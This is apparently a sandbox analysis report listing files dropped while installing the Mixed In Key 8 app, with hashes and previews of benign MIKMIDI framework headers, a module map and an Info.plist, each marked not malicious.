Preview:	//.// MIKMIDIErrors.h.// Danceability.//.// Created by Andrew Madsen on 7/19/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. Error domain for errors generated by MIKMIDI.. /.extern NSString const MIKMIDIErrorDomain;../*. Error code values for NSError objects in the MIKMIDI error domain.. /.typedef NS_ENUM(NSInteger, MIKMIDIErrorCode) {../.. Unknown error... /..MIKMIDIUnknownErrorCode = 1,../.. .Invalid argument error... /..MIKMIDIInvalidArgumentError,../.. An error occurred because the connection to a device was lost... /..MIKMIDIDeviceConnectionLostErrorCode,../.. An connection error occurred because the device has no source endpoints... /..MIKMIDIDeviceHasNoSourcesErrorCode,../.. MIDI mapping using MIKMIDIMappingGenerator failed... /..MIKMIDIMappingFailedErrorCode,../.. The mapping file did not have the correct file

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_qqX1bF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2508
Entropy (8bit):	5.042222590968136
Encrypted:	false
SSDEEP:	48:f/YY68doau4R4GujpIhoabGujpIJgXR5pjxWWwxWNd:f/1eQQ9nI9qgXRg/sT
MD5:	768A7EF8186ACAF4E38CA6BA2D0CBBE5
SHA1:	0A9C48034C7CC8F45B57244841671169F5DC13FE
SHA-256:	F6C37C202083C0D27CB477E6688DA4901DD370ADC6393A838AA58F8CD82918FE
SHA-512:	AE945F61815FB2B1FDCD8C62144F6D08BF184C044EBF033715FF780D0B4E29AD0F04F16F3D8C0BCF9BC832DA5DD3C38A9D689CDB5533522546EFDD2B660249E8
Malicious:	false
Preview:	//.// MIKMIDINoteOnCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDINoteCommand.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI note on message.. /.@interface MIKMIDINoteOnCommand : MIKMIDINoteCommand../. Convenience method for creating a note on command.. . @param note The note number for the command. Must be between 0 and 127.. * @param velocity The velocity for the command. Must be between 0 and 127.. * @param channel The channel for the command. Must be between 0 and 15.. * @param timestamp The timestamp for the command. Pass nil to use the current date/time.. . @return An initialized MIKMIDINoteOnCommand instance.. /.+ (instancetype)noteOnCommandWithNote:(NSUInteger)note........ velocity:(NSUInteger)velocity........ channel:(UInt8)channel........timestamp:(nullable NSDate )timestamp;.../*. Convenience method for creating a note on command.. . @param n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_syQVRJ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	5246
Entropy (8bit):	4.903417392254864
Encrypted:	false
SSDEEP:	96:ZvNLcdLXI4uVv6Mrgin4MAHginwKUkD9tb2gNbKyyhibJKvVoYICQKS8Rv:HLc5wp6SD4JDw0LZKyhJGOnCQKSM
MD5:	404A65C3D8B1F97203986D2C108169C3
SHA1:	751FC1E25D1482DF359F79CEDD4BC2A11623CD66
SHA-256:	54DA6C371CA099FE4550FBB5C00C9F42949A4B6F055D9EB70E323DE7CCFADABF
SHA-512:	3328B54801352830AEE6069227AA61F7733E96B97541227A7BB459F4CD7379C0DD7AA171DCE592EA4E92EC4ABF61D876C413A483783FFC03AA0C55B210801A42
Malicious:	false
Preview:	//.// MIKMIDISynthesizer.h.// .//.// Created by Andrew Madsen on 2/19/15..//.//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDISynthesizerInstrument.h".#import "MIKMIDICommandScheduler.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDISynthesizer provides a simple way to synthesize MIDI messages to. * produce sound output.. . To use it, simply create a synthesizer instance, then pass MIDI messages. * to it by calling -handleMIDIMessages:.. . A subclass, MIKMIDIEndpointSynthesizer, adds the ability to easily connect. * to a MIDI endpoint and automatically synthesize incoming messages.. . @see MIKMIDIEndpointSynthesizer. . /.@interface MIKMIDISynthesizer : NSObject <MIKMIDICommandScheduler>..#pragma clang diagnostic push.#pragma clang diagnostic ignored "-Wnullability" // See https://github.com/mixedinkey-opensource/MIKMIDI/issues/216./*. Initializes an MIKMIDISynthesizer instance which u

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_tWwOOW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	4187
Entropy (8bit):	4.928890285312041
Encrypted:	false
SSDEEP:	48:dDM9/sw0wJs/FYYRtjVG/MMFrT48MbrQFZz2GrUGXDpGq/LUxq6PgZV:GJsWejIjT4x+ZyK//LUxqKgz
MD5:	133D052B03E08C189BD062410A53F504
SHA1:	FC52B68CB9DEEF54D1AC608A069EB0FCF7D77323
SHA-256:	D7966502BD8E205BDD6AA773D09228F7560D8082D05AFD5349C673E71394C5BE
SHA-512:	EAF9FDABF08CEE58B2048E18C769913414D081BE1F3B125FE4D69ED6DFE1E445404D4895C4E988AE16DDDF2F73C5832DC6257B4CB3A889A580AD908BC564D0AD
Malicious:	false
Preview:	//.// MIKMIDIMetadataEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..static const NSUInteger MIKMIDIEventMetadataStartOffset = 8;../*. Subtypes of MIKMIDIMetaEvent. You should use the corresponding meta subtypes in MIKMIDIEventType when. * initializing an event with -initWithTimeStamp:midiEventType:data: or similar methods.. . The reason for a separate enum here, even though there is a 1 to 1 correspondence with values in . * MIKMIDIEventType is that these values are dictated by the MIDI standard, and overlap values defined. * for MusicEventType. Having these separately defined allows us to effectively "flatten" MIKMIDIEventType. * to treat meta event subtypes as first class event types.. */.typedef NS_ENUM(UInt8, MIKMIDIMetaEventType).{..MIKMIDIMetaEventTypeSequenceNumber = 0x00,..MIKMIDIMetaEventTypeTextEven

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_tz4zWZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	3488
Entropy (8bit):	4.956251009216124
Encrypted:	false
SSDEEP:	96:V/d1AQiHmAaHyJZSSW45snPbbfgD72/sT:BMQiH3aHZSEYX2UT
MD5:	90E90E99CA0DBC377FE042592CE93305
SHA1:	823D4ABD38B2F2707A03C0768C0FB2514A6A1018
SHA-256:	7CD97C4AE5742EB5C1A85490980578A32D3899987FFA994A274847E4F4B882CF
SHA-512:	3DCA5A82855B39131C3621E04445DEE80F56034687B073F9A0B3F8202FF8F4FC725F7CB23223DB59BD0F95FB03ECA20C1B36EB6671A02E9247348D4686D8D16B
Malicious:	false
Preview:	//.// MIKMIDINoteOffCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDINoteCommand.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI note off message.. /.@interface MIKMIDINoteOffCommand : MIKMIDINoteCommand../. Convenience method for creating a note off command.. . @param note The note number for the command. Must be between 0 and 127.. * @param velocity The velocity for the command. Must be between 0 and 127.. * @param channel The channel for the command. Must be between 0 and 15.. * @param timestamp The timestamp for the command. Pass nil to use the current date/time.. . @return An initialized MIKMIDINoteOffCommand instance.. /.+ (instancetype)noteOffCommandWithNote:(NSUInteger)note........ velocity:(NSUInteger)velocity........ channel:(UInt8)channel........ timestamp:(nullable NSDate )timestamp;../*. Convenience method for creating a note off command.. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_uCxgKv Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	4217
Entropy (8bit):	5.067261939431002
Encrypted:	false
SSDEEP:	48:Z4Y191JWKc1/3Kxc1vTkanqps3n99uhnwLaPpHMRP3PAwXUiFfSgnKPR8TnokRsz:ZH8z/Bl3n9ZLaPyRP3PBXUiEwSq2yY
MD5:	C3B9963A7845D7AA5017CF9BE9EBA508
SHA1:	A9E36EC2E411F6350D51947D7CB6A1E60183921D
SHA-256:	65511548B999025AEA8396C973F7926196A5E450D8F89EC717DF47827C884479
SHA-512:	EB9A4136370943ECB41191A76DE8B945E9BEC634382E3809718B0EAD06BACDE32CA0455E84B8185FA8CFE2C3B96D5DE1ECB59E0F4EAA034AC4A03570A7AEA27B
Malicious:	false
Preview:	//.// MIKMIDIUtilities.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreMIDI/CoreMIDI.h>.#import "MIKMIDIMappableResponder.h".#import "MIKMIDICommand.h".#import "MIKMIDICompilerCompatibility.h".#include <mach/mach_time.h>..NS_ASSUME_NONNULL_BEGIN..NSString * _Nullable MIKStringPropertyFromMIDIObject(MIDIObjectRef object, CFStringRef propertyID, NSError __autoreleasingerror);.BOOL MIKSetStringPropertyOnMIDIObject(MIDIObjectRef object, CFStringRef propertyID, NSString string, NSError __autoreleasingerror);..SInt32 MIKIntegerPropertyFromMIDIObject(MIDIObjectRef object, CFStringRef propertyID, NSError __autoreleasingerror);.BOOL MIKSetIntegerPropertyFromMIDIObject(MIDIObjectRef object, CFStringRef propertyID, SInt32 integerValue, NSError __autoreleasingerror);..MIDIObjectType MIKMIDIObjectTypeOfObject(MIDIObjectRef object, NSError __autoreleasing*error);..NSS

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_vU9KgC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1472
Entropy (8bit):	5.312025313430408
Encrypted:	false
SSDEEP:	24:ZXENb9E+CqqI5rCzRajyCznDEgXwelI29V20P204LSm/:y59E+P5rCzbCzDJJ2k14LSk
MD5:	8809BECAACE923A847B307AA405FBE7C
SHA1:	DF1595EB6629356FDEE8C1E84B9B38B25F014C3A
SHA-256:	0A3EB02E840EADDD70A53DA9DF5F3E8F1F50FEEB7B3E9BD6AC1AF40B838BFED4
SHA-512:	BF5A722707BD505AEB1233A53E680FB68FB5E17F021815F4408787CE741C55A6A5725D99A12C62B53E03D10035B466A32397B0CA603E3580CB3CADD89C2BD9B7
Malicious:	false
Preview:	//.// MIKMIDICompilerCompatibility.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/4/15..// Copyright . 2015 Mixed In Key. All rights reserved..//../. This header contains macros used to adopt new compiler features without breaking support for building MIKMIDI. with older compiler versions.. /..// Keep older versions of the compiler happy.#ifndef NS_ASSUME_NONNULL_BEGIN.#define NS_ASSUME_NONNULL_BEGIN.#define NS_ASSUME_NONNULL_END.#define nullable.#define nonnullable.#define __nullable.#endif..#ifndef MIKArrayOf.#if __has_feature(objc_generics)..#define MIKArrayOf(TYPE) NSArray<TYPE>.#define MIKArrayOfKindOf(TYPE) NSArray<__kindof TYPE>..#define MIKMutableArrayOf(TYPE) NSMutableArray<TYPE>..#define MIKSetOf(TYPE) NSSet<TYPE>.#define MIKMutableSetOf(TYPE) NSMutableSet<TYPE>..#define MIKMapTableOf(KEYTYPE, OBJTYPE) NSMapTable<KEYTYPE, OBJTYPE>..#else..#define MIKArrayOf(TYPE) NSArray.#define MIKArrayOfKindOf(TYPE) NSArray..#define MIKMutableArrayOf(TYPE) NSMutableArray..#define

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_w0Z4PF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.075158198176606
Encrypted:	false
SSDEEP:	24:Zh33oHR33j68c/E4POEXwhO/naHoGllFjFqi8iZP5t+TsZ4:DoHRj68hQrX8HoGllDqUAYZ4
MD5:	0AAD3109A74F51B02B0B0CA3750F91C9
SHA1:	645CE129C2A5D078433EE12C20BF9099AE767B4F
SHA-256:	74CBADB34AD7B9B143EC8AEB4D6EDD0C6EB1C44D35B60E3A9CDE9D7E59718016
SHA-512:	BA443AE29236698921469CCF8B87198A523FAD11E8EEE30816CEF37AA985FA836997D1038375B477E0B0F2BC217D696D574930BDD9A32A75AA1D1B53D0E6EA85
Malicious:	false
Preview:	//.// MIKMIDIMetronome.h.// MIKMIDI.//.// Created by Chris Flesner on 11/24/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEndpointSynthesizer.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. .This class is only a subclass of MIKMIDIEndpointSynthesizer so it continues to function with MIKMIDIPlayer while. .it still exists. Once MIKMIDIPlayer is removed from the code base, expect this to become a subclass of MIKMIDISynthesizer.. /.@interface MIKMIDIMetronome : MIKMIDIEndpointSynthesizer..- (nullable instancetype)init;.// makes -init available to subclass in Swift while we're still a subclass of MIKMIDIEndpointSynthesizer..@property (nonatomic) MIDINoteMessage tickMessage;.@property (nonatomic) MIDINoteMessage tockMessage;..@end...@interface MIKMIDIMetronome (Private)../*. This should not be called directly, but may be overridden by subclasses to setup the metronome instrument. .in a custom manner.. /.- (BOOL)setupM

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_w7CuRX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1528
Entropy (8bit):	5.033647047822556
Encrypted:	false
SSDEEP:	24:Zf/bdcB3EywIH4/kuidmrx+roFp+w/PFXW94UigHzm:dCYIH2DjorgNPFXWYgHq
MD5:	FDAE5C06FD8DA2CE3C45F35A4B2FEE2B
SHA1:	4AD3B752925B88549266841884E78328FB475660
SHA-256:	3E433CC0E995A4F28F9C6835963B8AAA59BEA8CAFCE9D53783B4F47BCCF6F198
SHA-512:	226F7EEEB62E61CF720CF620C9649B4909790084050C2C09B21BE8C43144154A727BEC25C1935F26F3BC6DC2966390A91B2630D2D552F35B7034F9203E9375EC
Malicious:	false
Preview:	//.// MIKMIDIProgramChangeEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/4/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI program change event.. . Program change events indicate a change in the patch number.. * These events can be sent to to a MIDI device or synthesizer to. .change the instrument the instrument/voice being used to synthesize MIDI.. . * This event is the counterpart to MIKMIDIProgramChangeCommand in the context. * of sequences/MIDI Files.. /.@interface MIKMIDIProgramChangeEvent : MIKMIDIChannelEvent../. The program (aka patch) number. From 0-127.. . Assuming the device or synthesizer playing this event. * supports the General MIDI sound set, you can find. * a list of instruments by their program number here:. * http://www.midi.org/techspecs/gm1sound.php. */.@property (nonatomic, readonly) NSUInteger program

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_xotspx Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	5094
Entropy (8bit):	4.946165813490842
Encrypted:	false
SSDEEP:	96:XxCdAMxI9RvsN8LT8WV0ugRkiRMuCaSs27tlCY1Whg092jZCc1RH1cHrJT+NG/+Z:0dAeUo8LT8WiugRkiRMuCf3Cw0RkjZCI
MD5:	543C5B02AF963A9D4696062EBB2CD2F7
SHA1:	D3FCFA7EA96458029DB3776B1DE7AFA0FDECB4A9
SHA-256:	91E9692CB0219D194FA89A51520D514FD9928024DBEA92B2FBDB0FDA32D66502
SHA-512:	BAF54C744FFCC0A605EBC010EE8136C4A299ADFA910E857BEB7F8146433F9E4037D92E541906441C470BDF152C9123152A1654C90A891FFAB2DDE2AAB67DB3F9
Malicious:	false
Preview:	//.// NSApplication+MIKMIDI.h.// Energetic.//.// Created by Andrew Madsen on 3/11/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <TargetConditionals.h>..#if TARGET_OS_IPHONE..#import <UIKit/UIKit.h>.#define MIK_APPLICATION_CLASS UIApplication.#define MIK_WINDOW_CLASS UIWindow.#define MIK_VIEW_CLASS UIView..#else..#import <Cocoa/Cocoa.h>.#define MIK_APPLICATION_CLASS NSApplication.#define MIK_WINDOW_CLASS NSWindow.#define MIK_VIEW_CLASS NSView..#endif..#import "MIKMIDICompilerCompatibility.h"../*. Define MIKMIDI_SEARCH_VIEW_HIERARCHY_FOR_RESPONDERS as a non-zero value to (re)enable searching. * the view hierarchy for MIDI responders. This is disabled by default because it's slow.. . @deprecated This feature still works, but its use is discouraged. It is deprecated and may be removed in the future.. /.//#define MIKMIDI_SEARCH_VIEW_HIERARCHY_FOR_RESPONDERS 0..@protocol MIKMIDIResponder;..@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../. MIKMI

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ywXQbP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1000
Entropy (8bit):	5.076988021740814
Encrypted:	false
SSDEEP:	12:ZJtu9/YqbowvnPvswtcmOrV/Optup1XUuq9tuptup1JtuDoiQeZsKsXBXSsoSszp:ZJ6/YYow3Ewqm4da61Xk9461JSOk
MD5:	C903C5E7676BDF005CC30BA323A0E534
SHA1:	9CBD60BF14D7E2EEDD36FB2C43F5A850B7217F7F
SHA-256:	A1CC183A12C43973614D19D8FA5BD11AC1E671CEADA8C508CCBBF6DA5D018B20
SHA-512:	DE9C761775FC3B5E8458A601661C446820A562EFD66D743DA14E9BDAF0E3EF794D929FAD5DC3DE5FF1974EDD0E5D6D7AF4D4B4ABA225F3FED5267B3D7E61D76F
Malicious:	false
Preview:	//.// MIKMIDISystemMessageCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDICommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI system message command. This class is also the base class for. * subclasses representing specific system message subtypes (e.g. SysEx).. /.@interface MIKMIDISystemMessageCommand : MIKMIDICommand..@end../. Mutable counterpart for MIKMIDISystemMessageCommand.. /.@interface MIKMutableMIDISystemMessageCommand : MIKMIDISystemMessageCommand..@property (nonatomic, strong, readwrite) NSDate timestamp;.@property (nonatomic, readwrite) MIKMIDICommandType commandType;.@property (nonatomic, readwrite) UInt8 dataByte1;.@property (nonatomic, readwrite) UInt8 dataByte2;..@property (nonatomic, readwrite) MIDITimeStamp midiTimestamp;.@property (nonatomic, copy, readwrite, null_resettable) NSData *data;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Modules/.BC.T_0nscRx Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	655
Entropy (8bit):	4.883244183562633
Encrypted:	false
SSDEEP:	12:/kIlFgI8RFgIuaFgI4crQCD4zcUISOHzM9Ii/z8AIWUzI3Iut:/HlFrcFrzFr4jCD4I3SOHwyi/QLWUTI
MD5:	B3B734D40CC6F6AA272D9B1C84CE06A8
SHA1:	A8A17EA2A087AD75C42BE98112CB6FAE6ADFE54D
SHA-256:	C30C244F49FBE8D86398A7825CB38154499C277F1AC3600D5B1824B63FDE19A5
SHA-512:	5692398BA10764FF1ECD3D09EDE6593C0C44DD2FB3EB1C522F95178A9FEAAC9C0FAE5095556C5B759FE0A90B54FF4E84858C01776A9AB1813BD96D1927B3FD8E
Malicious:	false
Preview:	framework module MIKMIDI {..umbrella header "MIKMIDI.h"....private header "MIKMIDIPort_SubclassMethods.h"..private header "MIKMIDISynthesizer_SubclassMethods.h"..private header "MIKMIDITransmittable.h"....export ..module { export * }....explicit module MIKMIDICommandSubclass {...header "MIKMIDICommand_SubclassMethods.h"...export ..}....explicit module MIKMIDIEventSubclass {...header "MIKMIDIEvent_SubclassMethods.h"...export ..}....explicit module MIKMIDIMetaEventSubclass {...header "MIKMIDIMetaEvent_SubclassMethods.h"...export ..}....explicit module MIKMIDISynthesizerSubclass {...header "MIKMIDISynthesizer_SubclassMethods.h"...export ..}.}.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/.BC.T_6nBAgb Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	376
Entropy (8bit):	5.216177249664715
Encrypted:	false
SSDEEP:	6:Z7MdKnIeiQrmFN096HMT96Tv1ZKkpZBeM099Kqy97Ks9mealz7kpJv:Z7RtqbVHowTvnuj9YKskeahE
MD5:	3E26EC90EDA1624087B1ECC2B739F8F3
SHA1:	1063A83098C68352605A6BD5235234876C39284A
SHA-256:	F9D5CE938DCD952EF456C278928E9C5376B52F45FD56224407FFD22516B70C6F
SHA-512:	07016F81E23CB8F1CC8AE0E404FDBF1C59D77B728C403B9DB4B5F286CCE9E7A4EBB321434278759FEAD2E61F021226C11D86AEF47C02D3D8BC8E02DB4A50469B
Malicious:	false
Preview:	//.// MIKMIDIPort_SubclassMethods.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <MIKMIDI/MIKMIDIPort.h>.#import <MIKMIDI/MIKMIDICompilerCompatibility.h>..NS_ASSUME_NONNULL_BEGIN..@interface MIKMIDIPort ()..@property (nonatomic, readwrite) MIDIPortRef portRef;..@end..NS_ASSUME_NONNULL_END.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/.BC.T_AC0Yv0 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	5.265078373096887
Encrypted:	false
SSDEEP:	24:ZxnB3S1NowninYvHHwEmkF3nHVOoVDVmZoGfQk2oGzgQ2hWQcrz1SaJPV:BS1NRbvH1V3RioGIboGR2ELrxSqV
MD5:	C60C5BBA4F98B44449DBEE3B8DBDEF67
SHA1:	24DCEA3A09F93B996B7CF3D89EF640A777F78C77
SHA-256:	DF9400DB69094C3742B4EC119D1363EDB2564B115524ADBE560D076242F36068
SHA-512:	538E42842955FD5182399E874DE7AEE224F9106BD0B34E1D577E4CB1B236EDC234EC8185B9C14BFA29B0445591BCC2EC8B72529CC5404ED5184A148469A2F4A7
Malicious:	false
Preview:	//.// MIKMIDIEventIterator.h.// MIKMIDI.//.// Created by Chris Flesner on 9/9/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDITrack;.@class MIKMIDIEvent;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIEventIterator is an Objective-C wrapper for CoreMIDI's MusicEventIterator. It is not intended for use by clients/users of. * of MIKMIDI. Rather, it should be thought of as an MIKMIDI private class.. /.@interface MIKMIDIEventIterator : NSObject..@property (nonatomic, readonly) BOOL hasPreviousEvent;.@property (nonatomic, readonly) BOOL hasCurrentEvent;.@property (nonatomic, readonly) BOOL hasNextEvent;.@property (nonatomic, readonly, nullable) MIKMIDIEvent currentEvent;..- (nullable instancetype)initWithTrack:(MIKMIDITrack )track;.+ (nullable instancetype)iteratorForTrack:(MIKMIDITrack )track;..- (BOOL)seek:(MusicTimeStamp)timeStamp;.- (BOOL)mo

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Resources/.BC.T_6msHOn Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1341
Entropy (8bit):	5.248418004712525
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6NSn3nMa63n42Rl0gp/z2PgCGexwMZhGt0G+c:cfyfVtSn3nc3njj0gF2ICGcwcGt0G+c
MD5:	4808A6CF5EF2BDF47535009107B9EED8
SHA1:	4F0AE69A41A858D4023DF36B7EB8BC7F0FCF2874
SHA-256:	0162EDEA04EF238C76F24D63BEF7B3F50A2129B9BEA1558681F1A28F0E7884E0
SHA-512:	60B12E155639C372F996C3872E3234293EE2EE8881D95F2A7E132336282D25733C27BEDEC54DA42C2992FC981D193DDE50698F0637FDD7AA9613154C17D9A4EF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKMIDI</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKMIDI</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKMIDI</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.5</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>877</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<s

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/_CodeSignature/.BC.T_ObfZKL Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	19698
Entropy (8bit):	5.312295442155583
Encrypted:	false
SSDEEP:	192:X3qNNWe+Wlsjg3tV0LUo7M8LDeAeL9+d5dcjaLVWx0q1VEDzko:qCKtWLUobLDeTLwQCqoDzd
MD5:	3FBEF3AD065DE3EDC96DD32524BB1E84
SHA1:	91D21BB5B1AB6B63558D0BC5D6E36EB678B9AF30
SHA-256:	146B7D2E3F023ABE2D63E6910D2F72149CA420F26D39EDB8B2C4F29811B4AC9A
